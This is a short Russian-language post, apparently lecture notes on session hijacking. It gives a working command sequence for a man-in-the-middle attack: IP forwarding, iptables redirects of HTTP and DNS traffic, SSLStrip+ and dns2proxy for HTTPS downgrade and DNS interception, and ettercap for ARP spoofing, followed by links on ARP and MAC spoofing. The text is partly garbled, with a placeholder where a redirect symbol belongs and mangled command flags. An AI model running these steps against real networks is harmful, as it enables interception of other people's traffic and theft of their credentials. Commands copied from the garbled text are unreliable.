Computer NetworksNETWORKS

ПРЕЗ 11 Перехват сеанса

DNS——————————————
Переключите вашу машину в режим пересылки (форвардинга).

sudo echo 1 !УГЛ.СК.ВПР! /proc/sys/net/ipv4/ip_forward

Настройте iptables для редиректа HTTP трафика:

sudo iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 2000
sudo iptables -t nat -A PREROUTING -p udp –destination-port 53 -j REDIRECT –to-port 53

Скачиваем и запускаем SSLStrip+.
git clone https://github.com/singe/sslstrip2.git
cd sslstrip2/
sslstrip -l 2000

Скачиваем и запускаем dns2proxy:
git clone https://github.com/singe/dns2proxy.git
cd dns2proxy/
sudo python dns2proxy.py

Запускаем графический интерфейс (-G):

sudo ettercap -G

——————–
INSTALLING———————————————————–
——————–

ARP-spoofing в Kali Linux | DefconRU

ARP-spoofing в Kali Linux

MAC address spoofing (Русский) – ArchWiki
https://wiki.archlinux.org/index.php/MAC_address_spoofing_(%D0%A0%D1%83%D1%81%D1%81%D0%BA%D0%B8%D0%B9)

source

ipv4

Alice AUSTIN

Alice AUSTIN is studying Cisco Systems Engineering. He has passion with both hardware and software and writes articles and reviews for many IT websites.